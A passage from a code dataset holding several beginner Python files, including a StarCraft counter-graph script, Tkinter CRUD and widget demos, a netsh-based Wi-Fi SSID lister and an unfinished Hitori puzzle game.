strongAgainst('Archon', 'Mutalisk')\r\n weakAgainst ('Archon', 'Thor')\r\n weakAgainst ('Archon', 'Ultralisk')\r\n weakAgainst ('Archon', 'Immortal')\r\n\r\n strongAgainst('Carrier', 'Thor')\r\n strongAgainst('Carrier', 'Mutalisk')\r\n strongAgainst('Carrier', 'Phoenix')\r\n weakAgainst ('Carrier', 'Viking')\r\n weakAgainst ('Carrier', 'Corruptor')\r\n weakAgainst ('Carrier', 'Void Ray')\r\n\r\n weakAgainst ('Mothership', 'Viking')\r\n weakAgainst ('Mothership', 'Corruptor')\r\n weakAgainst ('Mothership', 'Void Ray')\r\n\r\n strongAgainst('Oracle', 'SCV')\r\n strongAgainst('Oracle', 'Drone')\r\n strongAgainst('Oracle', 'Probe')\r\n weakAgainst ('Oracle', 'Viking')\r\n weakAgainst ('Oracle', 'Mutalisk')\r\n weakAgainst ('Oracle', 'Phoenix')\r\n\r\n strongAgainst('Tempest', 'Swarm Host')\r\n strongAgainst('Tempest', 'Siege Tank')\r\n strongAgainst('Tempest', 'Colossus')\r\n weakAgainst ('Tempest', 'Viking')\r\n weakAgainst ('Tempest', 'Corruptor')\r\n weakAgainst ('Tempest', 'Void Ray')\r\n\r\n strongAgainst('Adept', 'Zergling')\r\n strongAgainst('Adept', 'Zealot')\r\n strongAgainst('Adept', 'Marine')\r\n weakAgainst ('Adept', 'Roach')\r\n weakAgainst ('Adept', 'Stalker')\r\n weakAgainst ('Adept', 'Marauder')\r\n\r\n strongAgainst('Disruptor', 'Marauder')\r\n strongAgainst('Disruptor', 'Hydralisk')\r\n 
strongAgainst('Disruptor', 'Probe')\r\n weakAgainst ('Disruptor', 'Thor')\r\n weakAgainst ('Disruptor', 'Ultralisk')\r\n weakAgainst ('Disruptor', 'Immortal')\r\n\r\n strongAgainst('Zergling', 'Marauder')\r\n strongAgainst('Zergling', 'Hydralisk')\r\n strongAgainst('Zergling', 'Stalker')\r\n weakAgainst ('Zergling', 'Hellion')\r\n weakAgainst ('Zergling', 'Baneling')\r\n weakAgainst ('Zergling', 'Colossus')\r\n\r\n strongAgainst('Queen', 'Hellion')\r\n strongAgainst('Queen', 'Mutalisk')\r\n strongAgainst('Queen', 'Void Ray')\r\n weakAgainst ('Queen', 'Marine')\r\n weakAgainst ('Queen', 'Zergling')\r\n weakAgainst ('Queen', 'Zealot')\r\n\r\n strongAgainst('Hydralisk', 'Banshee')\r\n strongAgainst('Hydralisk', 'Mutalisk')\r\n strongAgainst('Hydralisk', 'Void Ray')\r\n weakAgainst ('Hydralisk', 'Siege Tank')\r\n weakAgainst ('Hydralisk', 'Zergling')\r\n weakAgainst ('Hydralisk', 'Colossus')\r\n\r\n strongAgainst('Baneling', 'Marine')\r\n strongAgainst('Baneling', 'Zergling')\r\n strongAgainst('Baneling', 'Zealot')\r\n weakAgainst ('Baneling', 'Marauder')\r\n weakAgainst ('Baneling', 'Roach')\r\n weakAgainst ('Baneling', 'Stalker')\r\n\r\n strongAgainst('Overseer', 'Banshee')\r\n strongAgainst('Overseer', 'Roach')\r\n strongAgainst('Overseer', 'Dark Templar')\r\n weakAgainst ('Overseer', 'Viking')\r\n weakAgainst ('Overseer', 'Mutalisk')\r\n weakAgainst ('Overseer', 'Stalker')\r\n\r\n strongAgainst('Roach', 'Hellion')\r\n strongAgainst('Roach', 'Zergling')\r\n strongAgainst('Roach', 'Zealot')\r\n weakAgainst ('Roach', 'Marauder')\r\n weakAgainst ('Roach', 'Ultralisk')\r\n weakAgainst ('Roach', 'Immortal')\r\n\r\n strongAgainst('Infestor', 'Marine')\r\n strongAgainst('Infestor', 'Mutalisk')\r\n strongAgainst('Infestor', 'Immortal')\r\n weakAgainst ('Infestor', 'Ghost')\r\n weakAgainst ('Infestor', 'Ultralisk')\r\n weakAgainst ('Infestor', 'High Templar')\r\n\r\n strongAgainst('Mutalisk', 'Viking')\r\n strongAgainst('Mutalisk', 'Brood Lord')\r\n strongAgainst('Mutalisk', 'Void Ray')\r\n weakAgainst ('Mutalisk', 'Thor')\r\n weakAgainst ('Mutalisk', 'Corruptor')\r\n weakAgainst ('Mutalisk', 'Phoenix')\r\n\r\n strongAgainst('Corruptor', 'Battlecruiser')\r\n strongAgainst('Corruptor', 'Mutalisk')\r\n strongAgainst('Corruptor', 'Phoenix')\r\n weakAgainst ('Corruptor', 'Viking')\r\n weakAgainst ('Corruptor', 'Hydralisk')\r\n weakAgainst ('Corruptor', 'Void Ray')\r\n\r\n strongAgainst('Ultralisk', 'Marauder')\r\n strongAgainst('Ultralisk', 'Roach')\r\n strongAgainst('Ultralisk', 'Stalker')\r\n weakAgainst ('Ultralisk', 'Banshee')\r\n weakAgainst ('Ultralisk', 'Mutalisk')\r\n weakAgainst ('Ultralisk', 'Void Ray')\r\n\r\n strongAgainst('Brood Lord', 'Marine')\r\n strongAgainst('Brood Lord', 'Hydralisk')\r\n strongAgainst('Brood Lord', 'Stalker')\r\n weakAgainst ('Brood Lord', 'Viking')\r\n weakAgainst ('Brood Lord', 'Corruptor')\r\n weakAgainst ('Brood Lord', 'Void Ray')\r\n\r\n strongAgainst('Swarm Host', 'Marine')\r\n strongAgainst('Swarm Host', 'Stalker')\r\n strongAgainst('Swarm Host', 'Roach')\r\n weakAgainst ('Swarm Host', 'Baneling')\r\n weakAgainst ('Swarm Host', 'Hellion')\r\n weakAgainst ('Swarm Host', 'Archon')\r\n\r\n strongAgainst('Viper', 'Siege Tank')\r\n strongAgainst('Viper', 'Colossus')\r\n strongAgainst('Viper', 'Hydralisk')\r\n weakAgainst ('Viper', 'Viking')\r\n weakAgainst ('Viper', 'Mutalisk')\r\n weakAgainst ('Viper', 'Phoenix')\r\n\r\n strongAgainst('Ravager', 'Siege Tank')\r\n strongAgainst('Ravager', 'Lurker')\r\n strongAgainst('Ravager', 'Sentry')\r\n weakAgainst ('Ravager', 
'Marauder')\r\n weakAgainst ('Ravager', 'Ultralisk')\r\n weakAgainst ('Ravager', 'Immortal')\r\n\r\n strongAgainst('Lurker', 'Marine')\r\n strongAgainst('Lurker', 'Hydralisk')\r\n strongAgainst('Lurker', 'Zealot')\r\n weakAgainst ('Lurker', 'Siege Tank')\r\n weakAgainst ('Lurker', 'Ultralisk')\r\n weakAgainst ('Lurker', 'Disruptor')\r\n\r\n\r\ndef writeGraph():\r\n with open('strongerGraph.tgf', 'w') as f:\r\n for name, i in units.items():\r\n print('{} {}'.format(i, name), file=f)\r\n\r\n print('#', file=f)\r\n\r\n for edge_from, edge_to in stronger:\r\n print('{} {}'.format(edge_from, edge_to), file=f)\r\n\r\n\r\nif __name__ == '__main__':\r\n names = []\r\n names += open('terran_units.txt', 'r').read().split('\\n')\r\n names += open('protoss_units.txt', 'r').read().split('\\n')\r\n names += open('zerg_units.txt', 'r').read().split('\\n')\r\n units = {}\r\n \r\n for i, name in enumerate(names):\r\n units[name] = i+1\r\n \r\n stronger = set()\r\n makeStrongerRelation()\r\n # writeGraph()\r\n edges = np.array(list(stronger))\r\n\r\n strgVsCnt = []\r\n weakVsCnt = []\r\n diffVsCnt = []\r\n for i, name in enumerate(names):\r\n strgVsCnt += [(np.sum(edges[:, 0] == i + 1), name)]\r\n weakVsCnt += [(np.sum(edges[:, 1] == i + 1), name)]\r\n diffVsCnt += [(strgVsCnt[-1][0] - weakVsCnt[-1][0], name)]\r\n\r\n print(sorted(strgVsCnt, reverse=True))\r\n print()\r\n print(sorted(weakVsCnt, reverse=True))\r\n print()\r\n print(sorted(diffVsCnt, reverse=True))\r\n","repo_name":"pisarik/Learning","sub_path":"haskell/starcraft/build_tgf_strongest_graph.py","file_name":"build_tgf_strongest_graph.py","file_ext":"py","file_size_in_byte":12448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
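The numpy tallies at the end of that script (strgVsCnt, weakVsCnt, diffVsCnt) can be computed straight from the edge set with collections.Counter; a sketch reusing the entry's `stronger` set of id pairs and its `units` name-to-id mapping:

from collections import Counter

def degree_table(stronger, units):
    out_deg = Counter(a for a, _ in stronger)   # matchups a unit wins
    in_deg = Counter(b for _, b in stronger)    # matchups it loses
    return sorted(((out_deg[i] - in_deg[i], name) for name, i in units.items()),
                  reverse=True)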
+{"seq_id":"23185796681","text":"#!/usr/bin/python\nimport os\n\nMONGODB_HOST = os.getenv('MONGODB_HOST', 'localhost')\nMONGODB_PORT = os.getenv('MONGODB_PORT', 27017)\nMONGODB_DBNAME = os.getenv('MONGODB_DBNAME', 'blockchain')\n#REDIS_PASSWORD = os.getenv('REDIS_PASSWORD', None)\nMONGODB_COLLECTIONS = {\n 'pending_transactions': 'transactions',\n 'list_nodes': 'nodes',\n 'mining': 'mining'\n}\n\nELASTIC_HOST = os.getenv('ELASTIC_HOST', 'http://localhost:9200')\nELASTIC_INDEX = \"blockchain\"\n\nAPI_NODE = os.getenv(\"API_NODE\", \"http://10.5.9.110:5000\")\nENV = os.getenv('ENV', 'develop')\n\nBLOCK_VAR_CONVERSIONS = {\n 'txid': str,\n 'index': int,\n 'nonce': int,\n 'hash': str,\n 'prev_hash': str,\n 'timestamp': str,\n 'data': str\n}\nCHAINDATA_DIR = \"./chaindata/\"\n\nNUM_ZEROS = int(os.getenv('NUM_ZEROS', 4))\nSTANDARD_ROUNDS = 100000","repo_name":"greatbn/kma-blockchain","sub_path":"core/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"19341367042","text":"from tkinter import ttk\r\nfrom tkinter import *\r\nfrom create import inserir_filmes, inserir_usuarios\r\nfrom read import listar_usuarios, procurar_usuario\r\nfrom update import up_usuario\r\nfrom delete import dt_usuario\r\nimport pyautogui\r\npyautogui.PAUSE = 1\r\n\r\njanela = Tk()\r\n\r\n\r\nclass Aplicacao():\r\n def __init__(self):\r\n self.janela = janela\r\n self.tela()\r\n self.frames()\r\n self.botoes()\r\n self.labels()\r\n self.inserts()\r\n self.lista()\r\n self.select_list()\r\n\r\n janela.mainloop()\r\n\r\n def tela(self):\r\n self.janela.title(\"NETFLIX\")\r\n self.janela.configure(background=\"cyan\")\r\n self.janela.geometry(\"700x800\")\r\n self.janela.resizable(True, True)\r\n self.janela.minsize(width=700, height=800)\r\n\r\n def frames(self):\r\n self.frame0 = Frame(self.janela, bg=\"black\")\r\n self.frame0.place(relheight=0.07, relwidth=0.94, relx=0.03, rely=0.03)\r\n self.frame1 = Frame(self.janela, bg=\"black\")\r\n self.frame1.place(relheight=0.20, relwidth=0.94, relx=0.03, rely=0.12)\r\n self.frame2 = Frame(self.janela, bg=\"black\")\r\n self.frame2.place(relheight=0.20, relwidth=0.94, relx=0.03, rely=0.34)\r\n\r\n def botoes(self):\r\n self.btBuscar = Button(self.frame0, text='Buscar', bg=\"cyan\", command=self.select_user)\r\n self.btBuscar.place(relx=0.15, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btLimpar = Button(self.frame0, text='Limpar', bg=\"cyan\", command=self.limpar_tela)\r\n self.btLimpar.place(relx=0.27, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btCreate = Button(self.frame0, text='Create', bg=\"cyan\", command=self.insert_user)\r\n self.btCreate.place(relx=0.45, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btRead = Button(self.frame0, text='Read', bg=\"cyan\", command=self.select_list)\r\n self.btRead.place(relx=0.57, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btUpdate = Button(self.frame0, text='Update', bg=\"cyan\", command=self.update_user)\r\n self.btUpdate.place(relx=0.69, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btDelete = Button(self.frame0, text='Delete', bg=\"cyan\", command=self.delete_user)\r\n self.btDelete.place(relx=0.81, rely=0.40, relwidth=0.1, relheight=0.50)\r\n\r\n self.btDimensao = Button(self.janela, text='Tela', bg=\"cyan\", command=self.dimension)\r\n self.btDimensao.place(relx=0.05, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btPosicao = Button(self.janela, text='Posicao', bg=\"cyan\", command=self.position)\r\n self.btPosicao.place(relx=0.20, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btMover = Button(self.janela, text='Mover', bg=\"cyan\", command=self.move)\r\n self.btMover.place(relx=0.35, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btAlerta = Button(self.janela, text='Alerta', bg=\"cyan\", command=self.alert)\r\n self.btAlerta.place(relx=0.50, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n self.btBot = Button(self.janela, text='bot', bg=\"cyan\", command=self.bot)\r\n self.btBot.place(relx=0.65, rely=0.50, relwidth=0.1, relheight=0.10)\r\n\r\n def labels(self):\r\n self.lbIDUsuario = Label(self.frame0, text=\"ID\", background=\"cyan\")\r\n self.lbIDUsuario.place(relx=0.005, rely=0.01, relwidth=0.1, relheight=0.3)\r\n\r\n self.lbNome = Label(self.frame1, text=\"Nome\", bg=\"cyan\")\r\n self.lbNome.place(relx=0.005, rely=0.06, relwidth=0.1, relheight=0.15)\r\n\r\n self.lbEmail = Label(self.frame1, text=\"Email\", bg=\"cyan\")\r\n self.lbEmail.place(relx=0.005, rely=0.37, relwidth=0.1, 
relheight=0.15)\r\n\r\n        self.lbPlano = Label(self.frame1, text=\"Plano\", bg=\"cyan\")\r\n        self.lbPlano.place(relx=0.005, rely=0.69, relwidth=0.1, relheight=0.15)\r\n\r\n        self.lbTipo = Label(self.frame1, text=\"Tipo\", bg=\"cyan\")\r\n        self.lbTipo.place(relx=0.32, rely=0.69, relwidth=0.1, relheight=0.15)\r\n\r\n        self.lbIdade = Label(self.frame1, text=\"Idade\", bg=\"cyan\")\r\n        self.lbIdade.place(relx=0.62, rely=0.69, relwidth=0.1, relheight=0.15)\r\n\r\n    def inserts(self):\r\n        self.insertIDUsuario = Entry(self.frame0, background=\"cyan\")\r\n        self.insertIDUsuario.place(relx=0.005, rely=0.40, relwidth=0.1, relheight=0.47)\r\n\r\n        self.insertNome = Entry(self.frame1, bg=\"cyan\")\r\n        self.insertNome.place(relx=0.155, rely=0.05, relwidth=0.75, relheight=0.23)\r\n\r\n        self.insertEmail = Entry(self.frame1, bg=\"cyan\")\r\n        self.insertEmail.place(relx=0.155, rely=0.37, relwidth=0.75, relheight=0.23)\r\n\r\n        self.insertPlano = Entry(self.frame1, bg=\"cyan\")\r\n        self.insertPlano.place(relx=0.155, rely=0.69, relwidth=0.15, relheight=0.23)\r\n\r\n        self.insertTipo = Entry(self.frame1, bg=\"cyan\")\r\n        self.insertTipo.place(relx=0.45, rely=0.69, relwidth=0.15, relheight=0.23)\r\n\r\n        self.insertIdade = Entry(self.frame1, bg=\"cyan\")\r\n        self.insertIdade.place(relx=0.75, rely=0.69, relwidth=0.15, relheight=0.23)\r\n\r\n    def lista(self):\r\n        self.listaCli = ttk.Treeview(self.frame2, height=3, columns=(\"col1\", \"col2\", \"col3\", \"col4\", \"col5\", \"col6\", \"col7\"))\r\n\r\n        self.listaCli.heading('#0', text='')\r\n        self.listaCli.heading('#1', text='ID')\r\n        self.listaCli.heading('#2', text='Nome')\r\n        self.listaCli.heading('#3', text='Email')\r\n        self.listaCli.heading('#4', text='Plano')\r\n        self.listaCli.heading('#5', text='Tipo')\r\n        self.listaCli.heading('#6', text='Class')\r\n\r\n        self.listaCli.column('#0', width=5)\r\n        self.listaCli.column('#1', width=35)\r\n        self.listaCli.column('#2', width=188)\r\n        self.listaCli.column('#3', width=188)\r\n        self.listaCli.column('#4', width=70)\r\n        self.listaCli.column('#5', width=70)\r\n        self.listaCli.column('#6', width=70)\r\n\r\n        self.listaCli.place(relx=0.025, rely=0.075, relwidth=0.925, relheight=0.85)\r\n\r\n        self.scrollLista = Scrollbar(self.frame2, orient='vertical')\r\n        self.listaCli.configure(yscrollcommand=self.scrollLista.set)\r\n        self.scrollLista.place(relx=0.949, rely=0.079, relwidth=0.02, relheight=0.84)\r\n\r\n    def insert_user(self):\r\n        if self.insertNome.get()!='':\r\n            inserir_usuarios(self.insertNome.get(), self.insertEmail.get(), self.insertPlano.get(),\r\n                             self.insertTipo.get(), self.insertIdade.get())\r\n        self.select_list()\r\n        self.limpar_tela()\r\n\r\n    def select_list(self):\r\n        self.listaCli.delete(*self.listaCli.get_children())\r\n        for i in listar_usuarios():\r\n            self.listaCli.insert(parent='', index=0, values=i)\r\n\r\n    def select_user(self):\r\n        self.listaCli.delete(*self.listaCli.get_children())\r\n        usuario = procurar_usuario(self.insertIDUsuario.get())\r\n        self.listaCli.insert(parent='', index=0, values=usuario[0])\r\n        self.insertNome.insert(0, usuario[0][1])\r\n        self.insertEmail.insert(0, usuario[0][2])\r\n        self.insertPlano.insert(0, usuario[0][3])\r\n        self.insertTipo.insert(0, usuario[0][4])\r\n        self.insertIdade.insert(0, usuario[0][5])\r\n\r\n    def limpar_tela(self):\r\n        # END is tkinter's end-of-text index constant\r\n        self.insertIDUsuario.delete(0, END)\r\n        self.insertNome.delete(0, END)\r\n        self.insertPlano.delete(0, END)\r\n        self.insertEmail.delete(0, END)\r\n        self.insertTipo.delete(0, END)\r\n        self.insertIdade.delete(0, END)\r\n        self.select_list()\r\n\r\n    def 
delete_user(self):\r\n        dt_usuario(self.insertIDUsuario.get())\r\n        self.select_list()\r\n        self.limpar_tela()\r\n\r\n    def update_user(self):\r\n        if self.insertNome.get():\r\n            self.insertIDUsuario.update()\r\n            self.insertNome.update()\r\n            self.insertPlano.update()\r\n            self.insertEmail.update()\r\n            self.insertTipo.update()\r\n            self.insertIdade.update()\r\n            up_usuario(self.insertIDUsuario.get(),\r\n                       self.insertNome.get(),\r\n                       self.insertEmail.get(),\r\n                       self.insertPlano.get(),\r\n                       self.insertTipo.get(),\r\n                       self.insertIdade.get())\r\n        self.limpar_tela()\r\n        self.select_list()\r\n\r\n    def dimension(self):\r\n        x, y = pyautogui.size()\r\n        print(x)\r\n        print(y)\r\n\r\n    def position(self):\r\n        w, z = pyautogui.position()\r\n        print(w)\r\n        print(z)\r\n\r\n    def move(self):\r\n        pyautogui.moveTo(50,50)\r\n\r\n\r\n    def alert(self):\r\n        print(pyautogui.confirm(text='Prometo fazer os exercicios', title='Feriado', buttons=['ok', 'Cancel']))\r\n\r\n    def bot(self):\r\n        pyautogui.press('win')\r\n        pyautogui.write('bloco')\r\n        pyautogui.press('enter')\r\n        pyautogui.write('Aula de PyautoGui' )\r\n        pyautogui.hotkey('ctrl', 's')\r\n        pyautogui.write('Rascunho')\r\n        pyautogui.hotkey('alt', 'l')\r\n        pyautogui.hotkey('win', 'd')\r\n","repo_name":"Kadu17/Exercicios.py","sub_path":"janela.py","file_name":"janela.py","file_ext":"py","file_size_in_byte":8947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6004672442","text":"from tkinter import *\n\nimport tkinter\n\n\nbt = Button(text='spam')\nbt.pack(padx=20, pady=20)\n\nbt.config(bd=8, relief=RAISED)\nbt.config(bg='dark green', fg='gray')\n\nbt.config(font=('helvetica', 20, 'underline italic'))\n\n\n\n\nmainloop()\n","repo_name":"jonasht/programmingPython-book","sub_path":"08-ATkinterTour_part1/01-configuringWidgetAppearance/configButton.py","file_name":"configButton.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"22821137426","text":"import re\nimport subprocess\n\ndef getsidds():\n results = subprocess.check_output([\"netsh\",\"wlan\",\"show\",\"Network\", \"mode=Bssid\"])\n results = str(results).replace(\"\\\\r\",\"\")\n results = results.split(\"\\\\n\")\n results = results[4:]\n\n sidds = []\n intencities = []\n for x in results:\n print(x)\n if \":\" in x and not \" \" in x:\n name = re.search(\"[^:]*\", x)\n if len(x.replace(name[0],\"\")[2:]):\n sidds.append(x.replace(name[0],\"\")[2:])\n elif \"Signal\" in x:\n name = re.search(\"[^:]*\", x)\n if len(x.replace(name[0],\"\")[2:]):\n intencities.append(x.replace(name[0],\"\")[2:])\n nets = []\n for n in range(0,len(sidds)):\n data = {\n \"name\": sidds[n],\n \"intencity\": intencities[n]\n }\n nets.append(data)\n return(nets)","repo_name":"Hallip/Rovyle","sub_path":"Configuration Wizard/wifiConfiguration.py","file_name":"wifiConfiguration.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71027994642","text":"#Input : AABCAAADA\n#\t\t 3\n\n#Output : AB\n#\t\t CA\n#\t\t AD\n\nstring = \"AABCAAADA\" #input(\"String :\")\nk = 3 #int(input(\"K :\"))\n\nl = len(string)//k\n#st = 0\n#for i in range(l) :\n\n#MY METHOD-------------------------------\n\n#for i in range(0, len(s), l) :\n#\tsub = []\n#\tfor j in range(l) :\n#\t\tif s[j+i] not in sub :\n#\t\t\tsub.append(s[j+i])\n\t\t\n#\tprint(\"\".join(sub))\t\t\n\n#-----------------------------------------\t\n\n#OPTIMIZED METHOD-------------------------\n\ntemp = []\ntemp_len = 0\nfor S in string :\n\ttemp_len += 1\n\tif S not in temp :\n\t\ttemp.append(S)\n\tif temp_len == l :\n\t\tprint(\"\".join(temp))\n\t\ttemp = []\n\t\ttemp_len = 0 \t\n\n\t\n","repo_name":"AkashVD/Hackerrank_py","sub_path":"Merge_the_tools.py","file_name":"Merge_the_tools.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39526688484","text":"from boardgame import BoardGame\r\nfrom boardgamegui import BoardGameGui, gui_play\r\nfrom random import randrange\r\nimport g2d\r\n\r\nCIRCLE = -1\r\nBLACK = -3\r\n\r\nclass Hitori(BoardGame):\r\n\r\n\tdef __init__(self, side=8):\r\n\t\t#di partenza la matrice è 8x8\r\n\t\tself._cols, self._rows = side,side\r\n\t\tself._matriceOriginale = [[' ' for x in range(self._cols)] for y in range(self._rows)] #matrice per assegnare i valori numerici originari delle celle\r\n\t\tself._valoriGui = [] #matrice che verrà successivamente inizializzata\r\n\t\tself._valori = [[0 for x in range(self._cols)] for y in range(self._rows)] #matrice per assegnare soli valori black e circle\r\n\t\tself._automatismi = 0 #variabile per impostare l'automatismo\r\n\t\tself._regioniChiuse = 0 #variabile per segnare il numero di regioni chiuse\r\n\r\n\t#metodo per inizializzare la matrice e decidere la sua grandezza\r\n\tdef initMatriceGui(self, side: int):\r\n\t\tnum = randrange(0, 4)\r\n\t\tval = 0\r\n\t\tcontRows = 0\r\n\t\twith open(\"esempi\"+str(side)+\".txt\", \"r\") as file:\r\n\t\t\tfor linea in file:\r\n\t\t\t\tif val >= num * 10 and contRows < int(side):\r\n\t\t\t\t\trigaNum = linea.strip().split(\",\")\r\n\t\t\t\t\tself._valoriGui.append(rigaNum)\r\n\t\t\t\t\tcontRows += 1\r\n\t\t\t\tval += 1\r\n\r\n\tdef getRegioniChiuse(self) -> int:\r\n\t\treturn self._regioniChiuse\r\n\r\n\tdef setRegioniChiuse(self, numRegioniChiuse: int):\r\n\t\tself._regioniChiuse = numRegioniChiuse\r\n\r\n\tdef getValAutomatismi(self) -> int:\r\n\t\treturn self._automatismi\r\n\r\n\tdef setValAutomatismi(self, valAutomatismo: int):\r\n\t\tself._automatismi = valAutomatismo\r\n\r\n\t#metodo per tornare un valore numerico originale\r\n\tdef getElement(self, x: int, y: int) -> int:\r\n\t\treturn self._valoriGui[y][x]\r\n\r\n\tdef getMatriceOriginale(self):\r\n\t\treturn self._matriceOriginale\r\n\r\n\tdef setMatriceOriginale(self, matrice):\r\n\t\tself._matriceOriginale = matrice\r\n\r\n\tdef getMatriceGui(self):\r\n\t\treturn self._valoriGui\r\n\r\n\tdef setMatriceGui(self, matrice):\r\n\t\tself._valoriGui = matrice\r\n\r\n\tdef getMatrice(self):\r\n\t\treturn self._valori\r\n\r\n\tdef setMatrice(self, matrice):\r\n\t\tself._valori = matrice\r\n\r\n\tdef cols(self) -> int:\r\n\t\treturn self._cols\r\n\r\n\tdef rows(self) -> int:\r\n\t\treturn self._rows\r\n\r\n\tdef setCols(self, valCols: int):\r\n\t\tself._cols = valCols\r\n\r\n\tdef setRows(self, valRows: int):\r\n\t\tself._rows = valRows\r\n\r\n\t#metodo per controllare se ci sono delle regioni di celle bianche non contigue : NON funzionante\r\n\tdef controlloRegioniBianche(self):\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tcont = 0\r\n\t\tcont2 = 0\r\n\t\tsupp = 0\r\n\t\tsupp2 = 0\r\n\t\tesito = 0\r\n\t\tesito2 = 0\r\n\r\n\t\t# codice per il controllo di regioni di celle bianche non funzionanti\r\n\t\tfor x in range(self.rows()):\r\n\t\t\tfor y in range(self.cols()):\r\n\t\t\t\tif matrice2[x][y] == BLACK and esito == 0:\r\n\t\t\t\t\tif cont == 0 :\r\n\t\t\t\t\t\tsupp = x\r\n\t\t\t\t\tif x < self.cols()-1 and y < self.cols()-1 :\r\n\t\t\t\t\t\tif matrice2[x+1][y+1] == BLACK :\r\n\t\t\t\t\t\t\tcont += 1\r\n\t\t\t\t\t\t\tif cont == 7 - supp:\r\n\t\t\t\t\t\t\t\tself.setRegioniChiuse(self.getRegioniChiuse()+1)\r\n\t\t\t\t\t\t\t\tesito = 1\r\n\r\n\t\tfor x in range(self.rows()):\r\n\t\t\tfor y in range(self.cols()):\r\n\t\t\t\tif matrice2[x][y] == BLACK and esito2 == 0:\r\n\t\t\t\t\tif cont2 == 0 
:\r\n\t\t\t\t\t\tsupp2 = y\r\n\t\t\t\t\tif x > 0 and y > 0 :\r\n\t\t\t\t\t\tif matrice2[x - 1][y - 1] == BLACK:\r\n\t\t\t\t\t\t\tcont2 += 1\r\n\t\t\t\t\t\t\tif cont2 == 7 - supp2:\r\n\t\t\t\t\t\t\t\tself.setRegioniChiuse(self.getRegioniChiuse()+1)\r\n\t\t\t\t\t\t\t\tesito2 = 1\r\n\r\n\tdef finished(self) -> bool:\r\n\t\tif self.controlloCelleNereColonne() != 0 :\r\n\t\t\tg2d.alert(self.message(\"ci sono due celle nere vicine in una colonna\"))\r\n\t\tif self.controlloCelleNereRighe() != 0:\r\n\t\t\tg2d.alert(self.message(\"ci sono due celle nere vicine in una riga\"))\r\n\t\tif self.cellaBiancaChiusa() != 0 :\r\n\t\t\tg2d.alert(self.message(\"una o più celle bianche sono chiuse dalle celle nere\"))\r\n\r\n\t\tif(self.controlloRigheNumeri()/2 == 0 and self.controlloColonneNumeri()/2 == 0 and self.controlloCelleNereRighe() == 0\r\n\t\t\t\tand self.controlloCelleNereColonne() == 0 and self.cellaBiancaChiusa() == 0) :\r\n\t\t\treturn True\r\n\r\n\t#metodo che controlla che non ci siano numeri ripetuti in una riga\r\n\tdef controlloRigheNumeri(self) -> int:\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoRighe = 0\r\n\t\t# variabili usate per controllare che nel ciclo non venga guardata la cella che si sta già controllando\r\n\t\tcont1R = 0\r\n\t\tcont2R = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tfor val in range(self.cols()):\r\n\t\t\t\t\tif cont2R != cont1R and matriceVal[y][x] == matriceVal[y][val] and matrice2[y][x] != BLACK and matrice2[y][val] != BLACK:\r\n\t\t\t\t\t\tfinitoRighe += 1\r\n\t\t\t\t\tcont1R += 1;\r\n\t\t\t\tcont2R += 1;\r\n\t\t\t\tcont1R = 0\r\n\t\t\tcont2R = 0\r\n\r\n\t\treturn finitoRighe\r\n\r\n\t# metodo che controlla che non ci siano numeri ripetuti in una colonna\r\n\tdef controlloColonneNumeri(self) -> int:\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoColonne = 0\r\n\t\t#variabili usate per controllare che nel ciclo non venga guardata la cella che si sta già controllando\r\n\t\tcont1C = 0\r\n\t\tcont2C = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tfor val in range(self.cols()):\r\n\t\t\t\t\tif cont2C != cont1C and matriceVal[x][y] == matriceVal[val][y] and matrice2[x][y] != BLACK and matrice2[val][y] != BLACK:\r\n\t\t\t\t\t\tfinitoColonne += 1\r\n\t\t\t\t\tcont1C += 1;\r\n\t\t\t\tcont2C += 1;\r\n\t\t\t\tcont1C = 0\r\n\t\t\tcont2C = 0\r\n\t\treturn finitoColonne\r\n\r\n\t# metodo che controlla che non ci siano celle annerite vicine in una riga\r\n\tdef controlloCelleNereRighe(self) -> int:\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoNeriR = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tif x < self.cols()-1:\r\n\t\t\t\t\tif (matrice2[y][x] == BLACK and matrice2[y][x + 1] == BLACK):\r\n\t\t\t\t\t\tfinitoNeriR += 1\r\n\t\treturn finitoNeriR\r\n\r\n\t#metodo che controlla che non ci siano celle annerite vicine in una colonna\r\n\tdef controlloCelleNereColonne(self) -> int:\r\n\t\tmatrice2 = self.getMatrice()\r\n\t\tfinitoNeriC = 0\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tif x < self.cols()-1:\r\n\t\t\t\t\tif (matrice2[x][y] == BLACK and matrice2[x + 1][y] == BLACK):\r\n\t\t\t\t\t\tfinitoNeriC += 